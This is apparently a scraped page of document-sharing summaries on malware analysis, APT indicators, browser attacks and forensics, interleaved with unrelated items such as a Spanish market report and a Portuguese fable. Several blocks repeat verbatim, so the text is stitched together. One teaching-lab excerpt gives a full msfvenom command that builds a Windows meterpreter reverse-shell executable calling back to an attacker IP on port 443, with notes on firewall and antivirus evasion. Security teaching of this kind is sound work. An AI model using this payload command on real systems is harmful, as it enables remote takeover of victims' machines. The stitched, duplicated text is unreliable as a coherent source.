The malware encrypts harvested data using AES-256-CBC encryption with a predictable key based on readings from a Windows memory address containing time information. It collects a wide range of information from infected machines including screenshots, passwords, browser histories and Skype call audio. The malware uses various anti-analysis techniques such as virtualization, anti-debugging checks and process hiding. Analysis of the samples indicates the malware is FinSpy, a commercial spyware tool distributed by Gamma International as part of their FinFisher intrusion software.
The Evolution of the Fileless Click-Fraud Malware PoweliksSymantec
Poweliks is a fileless malware that infects computers and displays advertisements to generate revenue for its operators. It has evolved since 2013, starting as the file-based Wowliks and transforming into a registry-based threat known as Poweliks that exists solely in the registry. Poweliks uses novel techniques like registry protection, CLSID hijacking, and a zero-day privilege escalation to compromise computers. It has increased its capabilities over time, adding error reporting and using PowerShell to maintain persistence without requiring files. Poweliks infects computers to silently view ads in hidden browser windows, earning money for each ad shown while also potentially distributing other threats through malicious ads.
Gregor kopf , bernhard brehm. deniability in messaging protocolsYury Chemerkin
The document discusses the properties of deniability and secure function evaluation in the Off-the-Record (OTR) messaging protocol and similar cryptographic protocols, examining how OTR provides confidentiality, integrity, authentication, forward secrecy, and strong deniability through frequent rekeying and publishing of old MAC keys between parties.
Finland s cyber security strategy background dossierYury Chemerkin
This document provides background information on Finland's Cyber Security Strategy. It discusses the cyber domain and threats, principles of cyber security management, securing vital functions against cyber threats, cyber security regulation, and implementation of the strategy. The cyber domain is increasingly interconnected but also introduces new risks. Cyber attacks can disrupt critical infrastructure and society. Finland aims to increase cyber situation awareness, guarantee cybersecurity of businesses, prevent cybercrime, improve cyber defense capabilities, and foster international cooperation and research.
El resumen del día 14 de marzo de 2013 incluye: los montos negociados en los diferentes mercados fueron de $5.737 millones, un aumento del 51,19% en renta fija. Los índices MAE en pesos y dólares subieron levemente, mientras que el índice de bonos soberanos en pesos aumentó un 0,151%. El mercado de cambio mostró una variación del 0,163% en el índice MAE en dólares.
Uma velha árvore lamentava-se por estar seca e sem frutos, mas um passarinho a ajudou a se rehidratar trazendo água em seu bico junto com outros pássaros. A árvore floresceu novamente, mas depois se recusou a deixar os pássaros usarem seus galhos, até que quase foi cortada, momento em que os pássaros a ajudaram outra vez retirando seus frutos pesados.
The Crisis malware is an advanced malware that infects both Windows and Mac computers. It has the ability to steal browser history, contacts, audio/visual recordings and more. It spreads initially through a signed Java applet and then installs core modules and drivers onto the infected system. Both Windows and Mac versions share similar information stealing and command and control capabilities. The Windows version uniquely targets virtual machines by mounting and infecting VM disk images, and can also steal social media and email account information. The malware authors remain anonymous but the code quality suggests it was intended for espionage or private investigation.
Web metrics like hits, page views, uniques, visits, and conversions are commonly used to measure websites but have limitations. Key terms like hits, page views, uniques, visits, conversions, bounce rate, referrer, entry/exit pages, and organic search are defined to understand how to properly interpret web analytics data and its limitations for measuring audiences and success. Relying solely on technical metrics like IPs and cookies to identify uniques can be unreliable since they don't account for shared networks or disabled cookies.
The Evolution of the Fileless Click-Fraud Malware PoweliksSymantec
Poweliks is a fileless malware that infects computers and displays advertisements to generate revenue for its operators. It has evolved since 2013, starting as the file-based Wowliks and transforming into a registry-based threat known as Poweliks that exists solely in the registry. Poweliks uses novel techniques like registry protection, CLSID hijacking, and a zero-day privilege escalation to compromise computers. It has increased its capabilities over time, adding error reporting and using PowerShell to maintain persistence without requiring files. Poweliks infects computers to silently view ads in hidden browser windows, earning money for each ad shown while also potentially distributing other threats through malicious ads.
Gregor kopf , bernhard brehm. deniability in messaging protocolsYury Chemerkin
The document discusses the properties of deniability and secure function evaluation in the Off-the-Record (OTR) messaging protocol and similar cryptographic protocols, examining how OTR provides confidentiality, integrity, authentication, forward secrecy, and strong deniability through frequent rekeying and publishing of old MAC keys between parties.
Finland s cyber security strategy background dossierYury Chemerkin
This document provides background information on Finland's Cyber Security Strategy. It discusses the cyber domain and threats, principles of cyber security management, securing vital functions against cyber threats, cyber security regulation, and implementation of the strategy. The cyber domain is increasingly interconnected but also introduces new risks. Cyber attacks can disrupt critical infrastructure and society. Finland aims to increase cyber situation awareness, guarantee cybersecurity of businesses, prevent cybercrime, improve cyber defense capabilities, and foster international cooperation and research.
El resumen del día 14 de marzo de 2013 incluye: los montos negociados en los diferentes mercados fueron de $5.737 millones, un aumento del 51,19% en renta fija. Los índices MAE en pesos y dólares subieron levemente, mientras que el índice de bonos soberanos en pesos aumentó un 0,151%. El mercado de cambio mostró una variación del 0,163% en el índice MAE en dólares.
Uma velha árvore lamentava-se por estar seca e sem frutos, mas um passarinho a ajudou a se rehidratar trazendo água em seu bico junto com outros pássaros. A árvore floresceu novamente, mas depois se recusou a deixar os pássaros usarem seus galhos, até que quase foi cortada, momento em que os pássaros a ajudaram outra vez retirando seus frutos pesados.
The Crisis malware is an advanced malware that infects both Windows and Mac computers. It has the ability to steal browser history, contacts, audio/visual recordings and more. It spreads initially through a signed Java applet and then installs core modules and drivers onto the infected system. Both Windows and Mac versions share similar information stealing and command and control capabilities. The Windows version uniquely targets virtual machines by mounting and infecting VM disk images, and can also steal social media and email account information. The malware authors remain anonymous but the code quality suggests it was intended for espionage or private investigation.
Web metrics like hits, page views, uniques, visits, and conversions are commonly used to measure websites but have limitations. Key terms like hits, page views, uniques, visits, conversions, bounce rate, referrer, entry/exit pages, and organic search are defined to understand how to properly interpret web analytics data and its limitations for measuring audiences and success. Relying solely on technical metrics like IPs and cookies to identify uniques can be unreliable since they don't account for shared networks or disabled cookies.
Yury Chemerkin graduated from the Russian State University for the Humanities in 2010 and is currently a postgraduate student there. He has worked in information security since 2009, researching topics such as mobile security, cloud computing, and the privacy impacts of technologies like facial recognition. Currently, his PhD research focuses on legal issues surrounding cloud security and privacy regulations in Russia and the EU.
Dmitriy evdokimov. light and dark side of code instrumentationYury Chemerkin
This document discusses code instrumentation techniques. It begins by introducing the speaker and defining instrumentation as adding extra code to a program or environment for monitoring or changing program behavior. It then covers various uses of instrumentation including debugging, testing, profiling, and security applications like malware analysis. The document categorizes instrumentation approaches as static, load-time, or dynamic depending on when the instrumentation is applied. It provides examples of instrumentation for different programming languages and environments like Java, .NET, and ActionScript.
This document contains SSL certificates used by APT1, a Chinese cyber espionage group, to encrypt malware communications. It provides 4 self-signed certificates - VIRTUALLYTHERE, IBM, WEBMAIL, and ALPHA - that contain information like issuer, validity period, subject, and public key. Detecting these certificates may indicate an APT1 malware infection.
Frankenstein. stitching malware from benign binariesYury Chemerkin
This document proposes a new malware propagation system called Frankenstein that stitches together code sequences from benign programs to generate obfuscated malware copies. Frankenstein searches benign programs for "gadgets", which are sequences of instructions that can be combined to perform tasks. It uses these gadgets to synthesize new malware copies by composing gadgets according to a high-level "semantic blueprint", making the copies harder to detect than traditional metamorphic malware. The authors implement a proof-of-concept Frankenstein system and show that mining a few local programs provides enough gadgets to synthesize arbitrary functionality.
The regulation of ant colony foraging activity without spatial informationYury Chemerkin
This document presents a stochastic model of how harvester ant colonies regulate their foraging activity without using spatial information like pheromone trails. The model shows that the return rate of foragers to the nest can be described as a Poisson process. It then proposes a feedback-based algorithm where the rate of outgoing foragers leaving the nest depends on brief antennal contacts with returning foragers carrying food. The model fits experimental data manipulating the return rate of foragers and reproduces key features of how the colony regulates its foraging in response to changing food availability levels.
The document provides joint doctrine for information operations planning, preparation, execution, and assessment to support joint operations and achieve information superiority, establishes the core capabilities of information operations as electronic warfare, computer network operations, psychological operations, military deception, and operations security, and provides guidance on intelligence support, command relationships, and planning considerations for information operations.
Mario heiderich. got your nose! how to steal your precious data without using...Yury Chemerkin
This document provides a summary of a presentation by Mario Heiderich on scriptless attacks that can steal data from a user's browser without using scripts. The presentation covers several techniques, including using CSS to expose passwords, SVG images to log keystrokes in Firefox, and exploiting browser features like scrollbars to brute force CSRF tokens. It demonstrates attacks against login forms, password managers, and email clients. While difficult to defend against due to their use of legitimate browser features, the presenter suggests using a script blocker like NoScript can help protect against these types of scriptless attacks. The document outlines future areas of research around these attacks on mobile devices and applications.
This document introduces the Sulley fuzzing framework. It begins with background information on past fuzzing tools and their limitations. It then discusses Sulley's architecture, including its component breakdown and advanced features. Next, it covers usage and demos of Sulley through audits of Hewlett-Packard and Trend Micro software. Finally, it briefly mentions future development plans for Sulley.
The document discusses how data can be hidden in the service areas of hard drives, which are reserved areas used by hard drive vendors that are inaccessible to the operating system. A proof of concept tool is presented that demonstrates writing a file to these service areas, sanitizing the entire drive with zeros, and then still being able to read the file from the service areas, showing that data hidden there would not be removed by standard sanitization methods.
Cyber Defense Forensic Analyst - Real World Hands-on ExamplesSandeep Kumar Seeram
The document discusses analyzing malware using static and dynamic analysis techniques. Static analysis involves examining a malware file's code and structure without executing it, using tools like disassemblers and string extractors. Dynamic analysis executes malware in a controlled environment to observe its behaviors and any changes it makes. The document then demonstrates analyzing the "Netflix Account Generator" malware using an isolated cloud sandbox, where it is observed starting child processes and making outbound network connections, suggesting it is a remote access trojan.
SANS Digital Forensics and Incident Response Poster 2012Rian Yulian
This document outlines a 13-step process for analyzing a system for signs of malware infection. The steps include: reducing evidence files, performing antivirus checks, searching for indicators of compromise, automated and manual memory analysis, checking for persistence mechanisms, entropy/packing analysis, reviewing event logs, timeline analysis, third-party hash lookups, and analyzing MFT and file time anomalies. The goal is to methodically narrow down thousands of files to the few most likely to be malware through successive rounds of filtering and examination.
This document discusses various tools and techniques for performing basic dynamic malware analysis, including sandboxes, Process Monitor, Process Explorer, and Regshot. It explains how sandboxes like GFI Sandbox can provide initial analysis of malware but have limitations. Process Monitor and Process Explorer allow monitoring processes, registry changes, and other activity in real-time. Regshot facilitates comparing registry snapshots before and after malware is run.
The document analyzes the Ilomo/Clampi botnet through reverse engineering its malware. It finds that Ilomo uses an obfuscator called VMProtect to hide its functionality. Ilomo spreads through exploiting the Windows registry and uses an unusual method of injecting code into Internet Explorer processes to map its executable into memory. Its goal is information theft, stealing passwords and monitoring web traffic. The document provides a technical breakdown of Ilomo's behavior and components.
Lab-10 Malware Creation and Denial of Service (DoS) In t.docxpauline234567
Lab-10: Malware Creation and Denial of Service (DoS)
In this lab, you will create a malware by using the Metasploit Framework. You will also launch as Denial of Service (DoS) attack.Section-1: Create a Malware
Hackers usually create malicious files for different purposes, such as command and control, defense evasion, and persistence. Pentesters create malicious files for ethical purposes, such as performing tests to check the strength of the existing countermeasures. In this lab, you will create a malicious file, and you will explore the strategies to evade the antivirus systems.
Method-1: Create a malicious file by using msfvenom
1) Log in to Kali VM on your personal computer (as set up in Lab 1).
2) Open a terminal window by clicking the terminal icon on the taskbar.
3) Type
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_https LHOST=10.10.10.10 LPORT=443 -f exe -o ethical.exe in terminal window and press enter.
You can copy this command and paste it to the terminal window of the Kali VM.
4) After running this command, a file named
ethical.exe will be created.
Notes:
msfvenom is a command-line tool within the Metasploit Framework. It is used to create payloads such as malicious executables such as shellcodes and reverse shells. This page shows the different kinds of malicious shells that can be made by using msfvenom. Have a look at the headings:
https://burmat.gitbook.io/security/hacking/msfvenom-cheetsheet. If you want to learn more about msfvenom, refer to
https://www.offensive-security.com/metasploit-unleashed/msfvenom/
LHOST (Local Host): Specifies the attacker's IP address. When the victim runs this executable, it will establish a connection to that IP address. The IP address is 10.10.10.10. It is a randomly selected IP, and you will not connect to that IP in this lab.
LPORT (Local Port): Specifies the port on which the attacker machine (10.10.10.10) will listen to incoming connections from the victim machine. In this example, when the victim runs the executable, the victim's computer will create a connection to port 443 at the attacker machine (10.10.10.10). After the victim makes a connection to the attacker machine, the attacker can start performing malicious activities, including controlling the victim machine, accessing sensitive information, deleting files, etc.
Using port 443 in this malicious activity is the safest way for hackers because it is one of the ports that is not blocked by the firewalls and routers on the Internet and LANs (Local Area Networks). It is the default port for TLS traffic. (Mostly encrypted web traffic)
Msfvenom uses reverse_https payload to create a malicious file. The malicious file will then make a reverse https connection between the victim's and the attacker's computers once initiated by the victim.
The other parameters of msfvenom are relatively more straightforward. x86 specifies t.
This document provides an overview of reversing and malware analysis training. It discusses the purpose of malware analysis, different analysis techniques including static analysis, dynamic analysis and memory analysis. It provides examples of tools used for each technique like strings, PEview, and Volatility. The document demonstrates these concepts on a Zeus bot sample, showing its network activity, process and registry behavior through monitoring tools. Memory analysis with Volatility reveals hidden processes and network connections. The training aims to understand a malware's behavior and interaction with the system.
The document discusses using Netcat, an open-source networking utility, for old school pentesting techniques across the different phases of hacking including reconnaissance, scanning, gaining access, and maintaining access. It mentions how Netcat can be used to create a simple chat client and how the author has used Netcat in many ways for various pentesting functions from information gathering to maintaining a foothold on a target system. The document suggests readers may be familiar with Netcat from security courses or certifications where it is commonly used during the different phases of a penetration test.
Classification of Malware based on Data Mining Approachijsrd.com
This document discusses a system called the Intelligent Malware Detection System (IMDS) that uses data mining techniques to classify malware. The IMDS uses a PE parser to extract API execution sequences from Windows portable executable files. It then applies an OOA mining algorithm called OOA_Fast_FP-Growth to generate association rules from the API sequences to classify files as malware or benign. Experimental results showed the IMDS outperformed other classification techniques and anti-virus software in detecting malware.
This document discusses vulnerabilities in antivirus software. It begins by noting that over 165 vulnerabilities have been reported in antivirus software in the past 4 years according to the US National Vulnerability Database. It then examines why antivirus software is a target for attackers, including that users have blind faith in it and its error-prone nature in processing many file formats. The document outlines techniques used to find vulnerabilities, including source code audits, reverse engineering, and fuzzing. It also looks at exploiting found vulnerabilities, such as through weak permissions. The overall aim is to raise awareness of security issues in antivirus products.
Reversing & malware analysis training part 9 advanced malware analysisAbdulrahman Bassam
The document discusses a training program on reverse engineering and malware analysis. It provides an overview of static analysis, dynamic analysis and memory analysis techniques. It also includes a demonstration of analyzing a Zeus bot sample using these techniques. The demonstration shows taking the cryptographic hash, determining imports, submitting to VirusTotal, monitoring process, registry and network activity while executing in a sandbox, analyzing the memory dump with Volatility and more.
A zero-day (also known as 0-day) vulnerability is a computer-software vulnerability that is unknown to those who would be interested in mitigating the vulnerability.
Malicious pdf document detection based on feature extraction and entropyijsptm
In this paper we present a machine learning based approach for detection of malicious PDF documents. We identify various features in PDF documents which are used by malware authors to construct a malicious file. Based on these feature set we arrive on models which is used to detect malicious PDF documents. Based on these feature sets, detection rate is high as compared to approaches which depends on analysis of JavaScript embedded in the PDF document.
Understanding Malware Lateral Spread Used in High Value AttacksCyphort
APTs are known to use advanced Techniques, Tactics, and Procedures (TTP), including advanced malware design with protection layers, sandboxing evasion, and lateral movement inside penetrated networks to seek out high value targets. In this webinar, Nick Bilogorskiy of Cyphort Labs will review various lateral movement techniques and methods used by advanced threats in the past. He will look at some APT samples, e.g. Shamoon, in detail to show the specific steps in the lateral movement by the malware. Understanding the lateral movement of APT should help security defenders to better select and implement protection solutions.
Yury Chemerkin graduated from the Russian State University for the Humanities in 2010 and is currently a postgraduate student there. He has worked in information security since 2009, researching topics such as mobile security, cloud computing, and the privacy impacts of technologies like facial recognition. Currently, his PhD research focuses on legal issues surrounding cloud security and privacy regulations in Russia and the EU.
Dmitriy evdokimov. light and dark side of code instrumentationYury Chemerkin
This document discusses code instrumentation techniques. It begins by introducing the speaker and defining instrumentation as adding extra code to a program or environment for monitoring or changing program behavior. It then covers various uses of instrumentation including debugging, testing, profiling, and security applications like malware analysis. The document categorizes instrumentation approaches as static, load-time, or dynamic depending on when the instrumentation is applied. It provides examples of instrumentation for different programming languages and environments like Java, .NET, and ActionScript.
This document contains SSL certificates used by APT1, a Chinese cyber espionage group, to encrypt malware communications. It provides 4 self-signed certificates - VIRTUALLYTHERE, IBM, WEBMAIL, and ALPHA - that contain information like issuer, validity period, subject, and public key. Detecting these certificates may indicate an APT1 malware infection.
Frankenstein. stitching malware from benign binariesYury Chemerkin
This document proposes a new malware propagation system called Frankenstein that stitches together code sequences from benign programs to generate obfuscated malware copies. Frankenstein searches benign programs for "gadgets", which are sequences of instructions that can be combined to perform tasks. It uses these gadgets to synthesize new malware copies by composing gadgets according to a high-level "semantic blueprint", making the copies harder to detect than traditional metamorphic malware. The authors implement a proof-of-concept Frankenstein system and show that mining a few local programs provides enough gadgets to synthesize arbitrary functionality.
The regulation of ant colony foraging activity without spatial informationYury Chemerkin
This document presents a stochastic model of how harvester ant colonies regulate their foraging activity without using spatial information like pheromone trails. The model shows that the return rate of foragers to the nest can be described as a Poisson process. It then proposes a feedback-based algorithm where the rate of outgoing foragers leaving the nest depends on brief antennal contacts with returning foragers carrying food. The model fits experimental data manipulating the return rate of foragers and reproduces key features of how the colony regulates its foraging in response to changing food availability levels.
The document provides joint doctrine for information operations planning, preparation, execution, and assessment to support joint operations and achieve information superiority, establishes the core capabilities of information operations as electronic warfare, computer network operations, psychological operations, military deception, and operations security, and provides guidance on intelligence support, command relationships, and planning considerations for information operations.
Mario heiderich. got your nose! how to steal your precious data without using...Yury Chemerkin
This document provides a summary of a presentation by Mario Heiderich on scriptless attacks that can steal data from a user's browser without using scripts. The presentation covers several techniques, including using CSS to expose passwords, SVG images to log keystrokes in Firefox, and exploiting browser features like scrollbars to brute force CSRF tokens. It demonstrates attacks against login forms, password managers, and email clients. While difficult to defend against due to their use of legitimate browser features, the presenter suggests using a script blocker like NoScript can help protect against these types of scriptless attacks. The document outlines future areas of research around these attacks on mobile devices and applications.
This document introduces the Sulley fuzzing framework. It begins with background information on past fuzzing tools and their limitations. It then discusses Sulley's architecture, including its component breakdown and advanced features. Next, it covers usage and demos of Sulley through audits of Hewlett-Packard and Trend Micro software. Finally, it briefly mentions future development plans for Sulley.
The document discusses how data can be hidden in the service areas of hard drives, which are reserved areas used by hard drive vendors that are inaccessible to the operating system. A proof of concept tool is presented that demonstrates writing a file to these service areas, sanitizing the entire drive with zeros, and then still being able to read the file from the service areas, showing that data hidden there would not be removed by standard sanitization methods.
Cyber Defense Forensic Analyst - Real World Hands-on ExamplesSandeep Kumar Seeram
The document discusses analyzing malware using static and dynamic analysis techniques. Static analysis involves examining a malware file's code and structure without executing it, using tools like disassemblers and string extractors. Dynamic analysis executes malware in a controlled environment to observe its behaviors and any changes it makes. The document then demonstrates analyzing the "Netflix Account Generator" malware using an isolated cloud sandbox, where it is observed starting child processes and making outbound network connections, suggesting it is a remote access trojan.
SANS Digital Forensics and Incident Response Poster 2012Rian Yulian
This document outlines a 13-step process for analyzing a system for signs of malware infection. The steps include: reducing evidence files, performing antivirus checks, searching for indicators of compromise, automated and manual memory analysis, checking for persistence mechanisms, entropy/packing analysis, reviewing event logs, timeline analysis, third-party hash lookups, and analyzing MFT and file time anomalies. The goal is to methodically narrow down thousands of files to the few most likely to be malware through successive rounds of filtering and examination.
This document discusses various tools and techniques for performing basic dynamic malware analysis, including sandboxes, Process Monitor, Process Explorer, and Regshot. It explains how sandboxes like GFI Sandbox can provide initial analysis of malware but have limitations. Process Monitor and Process Explorer allow monitoring processes, registry changes, and other activity in real-time. Regshot facilitates comparing registry snapshots before and after malware is run.
The document analyzes the Ilomo/Clampi botnet through reverse engineering its malware. It finds that Ilomo uses an obfuscator called VMProtect to hide its functionality. Ilomo spreads through exploiting the Windows registry and uses an unusual method of injecting code into Internet Explorer processes to map its executable into memory. Its goal is information theft, stealing passwords and monitoring web traffic. The document provides a technical breakdown of Ilomo's behavior and components.
Lab-10 Malware Creation and Denial of Service (DoS) In t.docxpauline234567
Lab-10: Malware Creation and Denial of Service (DoS)
In this lab, you will create a malware by using the Metasploit Framework. You will also launch as Denial of Service (DoS) attack.Section-1: Create a Malware
Hackers usually create malicious files for different purposes, such as command and control, defense evasion, and persistence. Pentesters create malicious files for ethical purposes, such as performing tests to check the strength of the existing countermeasures. In this lab, you will create a malicious file, and you will explore the strategies to evade the antivirus systems.
Method-1: Create a malicious file by using msfvenom
1) Log in to Kali VM on your personal computer (as set up in Lab 1).
2) Open a terminal window by clicking the terminal icon on the taskbar.
3) Type
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_https LHOST=10.10.10.10 LPORT=443 -f exe -o ethical.exe in terminal window and press enter.
You can copy this command and paste it to the terminal window of the Kali VM.
4) After running this command, a file named
ethical.exe will be created.
Notes:
msfvenom is a command-line tool within the Metasploit Framework. It is used to create payloads such as malicious executables such as shellcodes and reverse shells. This page shows the different kinds of malicious shells that can be made by using msfvenom. Have a look at the headings:
https://burmat.gitbook.io/security/hacking/msfvenom-cheetsheet. If you want to learn more about msfvenom, refer to
https://www.offensive-security.com/metasploit-unleashed/msfvenom/
LHOST (Local Host): Specifies the attacker's IP address. When the victim runs this executable, it will establish a connection to that IP address. The IP address is 10.10.10.10. It is a randomly selected IP, and you will not connect to that IP in this lab.
LPORT (Local Port): Specifies the port on which the attacker machine (10.10.10.10) will listen to incoming connections from the victim machine. In this example, when the victim runs the executable, the victim's computer will create a connection to port 443 at the attacker machine (10.10.10.10). After the victim makes a connection to the attacker machine, the attacker can start performing malicious activities, including controlling the victim machine, accessing sensitive information, deleting files, etc.
Using port 443 in this malicious activity is the safest way for hackers because it is one of the ports that is not blocked by the firewalls and routers on the Internet and LANs (Local Area Networks). It is the default port for TLS traffic. (Mostly encrypted web traffic)
Msfvenom uses reverse_https payload to create a malicious file. The malicious file will then make a reverse https connection between the victim's and the attacker's computers once initiated by the victim.
The other parameters of msfvenom are relatively more straightforward. x86 specifies t.
This document provides an overview of reversing and malware analysis training. It discusses the purpose of malware analysis, different analysis techniques including static analysis, dynamic analysis and memory analysis. It provides examples of tools used for each technique like strings, PEview, and Volatility. The document demonstrates these concepts on a Zeus bot sample, showing its network activity, process and registry behavior through monitoring tools. Memory analysis with Volatility reveals hidden processes and network connections. The training aims to understand a malware's behavior and interaction with the system.
The document discusses using Netcat, an open-source networking utility, for old school pentesting techniques across the different phases of hacking including reconnaissance, scanning, gaining access, and maintaining access. It mentions how Netcat can be used to create a simple chat client and how the author has used Netcat in many ways for various pentesting functions from information gathering to maintaining a foothold on a target system. The document suggests readers may be familiar with Netcat from security courses or certifications where it is commonly used during the different phases of a penetration test.
Classification of Malware based on Data Mining Approachijsrd.com
This document discusses a system called the Intelligent Malware Detection System (IMDS) that uses data mining techniques to classify malware. The IMDS uses a PE parser to extract API execution sequences from Windows portable executable files. It then applies an OOA mining algorithm called OOA_Fast_FP-Growth to generate association rules from the API sequences to classify files as malware or benign. Experimental results showed the IMDS outperformed other classification techniques and anti-virus software in detecting malware.
This document discusses vulnerabilities in antivirus software. It begins by noting that over 165 vulnerabilities have been reported in antivirus software in the past 4 years according to the US National Vulnerability Database. It then examines why antivirus software is a target for attackers, including that users have blind faith in it and its error-prone nature in processing many file formats. The document outlines techniques used to find vulnerabilities, including source code audits, reverse engineering, and fuzzing. It also looks at exploiting found vulnerabilities, such as through weak permissions. The overall aim is to raise awareness of security issues in antivirus products.
Reversing & malware analysis training part 9 advanced malware analysisAbdulrahman Bassam
The document discusses a training program on reverse engineering and malware analysis. It provides an overview of static analysis, dynamic analysis and memory analysis techniques. It also includes a demonstration of analyzing a Zeus bot sample using these techniques. The demonstration shows taking the cryptographic hash, determining imports, submitting to VirusTotal, monitoring process, registry and network activity while executing in a sandbox, analyzing the memory dump with Volatility and more.
A zero-day (also known as 0-day) vulnerability is a computer-software vulnerability that is unknown to those who would be interested in mitigating the vulnerability.
Malicious pdf document detection based on feature extraction and entropyijsptm
In this paper we present a machine learning based approach for detection of malicious PDF documents. We identify various features in PDF documents which are used by malware authors to construct a malicious file. Based on these feature set we arrive on models which is used to detect malicious PDF documents. Based on these feature sets, detection rate is high as compared to approaches which depends on analysis of JavaScript embedded in the PDF document.
Understanding Malware Lateral Spread Used in High Value AttacksCyphort
APTs are known to use advanced Techniques, Tactics, and Procedures (TTP), including advanced malware design with protection layers, sandboxing evasion, and lateral movement inside penetrated networks to seek out high value targets. In this webinar, Nick Bilogorskiy of Cyphort Labs will review various lateral movement techniques and methods used by advanced threats in the past. He will look at some APT samples, e.g. Shamoon, in detail to show the specific steps in the lateral movement by the malware. Understanding the lateral movement of APT should help security defenders to better select and implement protection solutions.
The EternalBlue Exploit: how it works and affects systemsAndrea Bissoli
The purpose of this report is to focus on one particular aspect of a WannayCry malware in order to understand which vulnerability it ex- ploited and how it is spread into the internet. In the report it will be shown EternalBlue attack and how it is possible to take the pc control thanks to DoublePulsar attack and Meterpreter session. Than it is shown a study case in which it is performed a pivoting attack. In the end it is injected simple keyloggers in the machines attacked in order to take some useful informations.
Day by day, we store more and more confidential information on our computers, from sites account credentials to our bank account. Every day, malware becomes more and more silent, they don’t want you to be suspicious, they just want to stay into your device to do something …that you don’t really want.
Ransomware has become a lucrative criminal enterprise, with cyber criminals extorting over $209 million from organizations in just the first three months of 2016 alone. Ransomware works by encrypting files on infected machines and demanding ransom payments in exchange for the decryption key. While early ransomware dated back to 2005, the threat grew significantly in 2015 with over 400,000 infections and $325 million stolen. Ransomware variants now aim to disrupt device usage until payment is made. Organizations can help mitigate the risk of ransomware through practices like regular backups, keeping software updated, limiting user privileges, and restricting unknown applications.
This document provides an analysis of the Etumbot backdoor malware, including its capabilities and the targeted campaigns in which it has been used. Etumbot is delivered via spearphishing emails containing password-protected archive files. It installs persistently and uses decoy documents to distract victims while establishing command and control channels using encrypted HTTP requests. The malware is attributed to an Chinese threat actor group known for espionage against government and industry targets in East Asia.
Lab-12 Social Engineering and Physical Security The firs.docxpauline234567
This document describes two security labs - a social engineering lab and a physical security lab. In the social engineering lab, students are instructed to find a phishing email in their junk folder and analyze why it is considered spam. The physical security lab simulates a situation where an attacker exploits physical security vulnerabilities to access a company's network and steal password hashes from one of the Windows computers. Students are guided through steps as an attacker to gain remote desktop access to the target computer, export registry files containing password hashes, and use a tool to extract and view the password hashes, including that of the Administrator account.
The document discusses malware analysis techniques including static analysis, dynamic analysis, and memory analysis. Static analysis involves examining a file without executing it to determine things like file type and cryptographic hash. Dynamic analysis involves executing malware in a controlled environment to observe its behavior, such as file system, process, registry, and network activity. Memory analysis examines a computer's RAM to find artifacts and reveal hidden processes, network connections, and registry modifications. The document provides examples of analyzing a Zeus bot sample using these techniques.
Добро пожаловать в очередной выпуск ежемесячного сборника материалов, который является вашим универсальным ресурсом для получения информации о самых последних разработках, аналитических материалах и лучших практиках в постоянно развивающейся области безопасности. В этом выпуске мы подготовили разнообразную подборку статей, новостей и результатов исследований, рассчитанных как на профессионалов, так и на обычных любителей. Цель нашего дайджеста - сделать наш контент интересным и доступным. Приятного чтения
(https://boosty.to/chronicles_security + ссылки на источник внутри документа)
Добро пожаловать в очередной выпуск ежемесячного сборника материалов, который является вашим универсальным ресурсом для получения информации о самых последних разработках, аналитических материалах и лучших практиках в постоянно развивающейся области безопасности. В этом выпуске мы подготовили разнообразную подборку статей, новостей и результатов исследований, рассчитанных как на профессионалов, так и на обычных любителей. Цель нашего дайджеста - сделать наш контент интересным и доступным. Приятного чтения
(https://boosty.to/chronicles_security + ссылки на источник внутри документа)
Добро пожаловать в очередной выпуск ежемесячного сборника материалов, который является вашим универсальным ресурсом для получения информации о самых последних разработках, аналитических материалах и лучших практиках в постоянно развивающейся области безопасности. В этом выпуске мы подготовили разнообразную подборку статей, новостей и результатов исследований, рассчитанных как на профессионалов, так и на обычных любителей. Цель нашего дайджеста - сделать наш контент интересным и доступным. Приятного чтения
(https://boosty.to/irony_security + ссылки на источник внутри документа)
Добро пожаловать в очередной выпуск ежемесячного сборника материалов, который является вашим универсальным ресурсом для получения информации о самых последних разработках, аналитических материалах и лучших практиках в постоянно развивающейся области безопасности. В этом выпуске мы подготовили разнообразную подборку статей, новостей и результатов исследований, рассчитанных как на профессионалов, так и на обычных любителей. Цель нашего дайджеста - сделать наш контент интересным и доступным. Приятного чтения
(https://boosty.to/irony_security + ссылки на источник внутри документа)
Welcome to the next edition of our Monthly Digest, your one-stop resource for staying informed on the most recent developments, insights, and best practices in the ever-evolving field of security. In this issue, we have curated a diverse collection of articles, news, and research findings tailored to both professionals and casual enthusiasts. Our digest aims to make our content is both engaging and accessible. Happy reading
(https://boosty.to/overkill_security + check original source urls inside)
Welcome to the next edition of our Monthly Digest, your one-stop resource for staying informed on the most recent developments, insights, and best practices in the ever-evolving field of security. In this issue, we have curated a diverse collection of articles, news, and research findings tailored to both professionals and casual enthusiasts. Our digest aims to make our content is both engaging and accessible. Happy reading
(https://boosty.to/overkill_security + check original source urls inside)
Welcome to the next edition of our Monthly Digest, your one-stop resource for staying informed on the most recent developments, insights, and best practices in the ever-evolving field of security. In this issue, we have curated a diverse collection of articles, news, and research findings tailored to both professionals and casual enthusiasts. Our digest aims to make our content is both engaging and accessible. Happy reading
(https://boosty.to/snarky_security + check original source urls inside)
Welcome to the next edition of our Monthly Digest, your one-stop resource for staying informed on the most recent developments, insights, and best practices in the ever-evolving field of security. In this issue, we have curated a diverse collection of articles, news, and research findings tailored to both professionals and casual enthusiasts. Our digest aims to make our content is both engaging and accessible. Happy reading
(https://boosty.to/snarky_security + check original source urls inside)
Security Vulnerability Notice SE-2012-01-PUBLIC [Security vulnerabilities in ...Yury Chemerkin
This document summarizes a security vulnerability (Issue 54) discovered in Java SE Platform related to method handles. It details how the lack of security checks when resolving method handles using certain MethodHandle methods like resolveVirtual can allow access to protected members of arbitrary classes. The vulnerability on its own is not enough to bypass Java security, but combined with another issue (Issue 55) it can be used to achieve a full sandbox bypass. The vendor Oracle was notified but has so far not acknowledged Issue 54 as a vulnerability, claiming the behavior is allowed. The reporting organization disagrees with this assessment.
The document discusses the Red October malware campaign and describes its use of a Java exploit to infiltrate victim networks in early 2012. It notes that the Java exploit (CVE-2011-3544) was delivered via a link to a site hosting the malicious NewsFinder.jar file. If clicked, it would exploit outdated Java versions. The exploit installed a downloader that communicated with the attackers' command and control servers, and could receive and execute additional malware payloads. The document analyzes the encryption routines and network communications used by the Java exploit and downloader.
The document provides network, file, system and email indicators of compromise from the Comment Crew group observed over the past year. It lists domains, IP addresses, filenames and file hashes that may be associated with Comment Crew attacks but could also match legitimate software. Additional verification is needed to confirm an actual compromise.
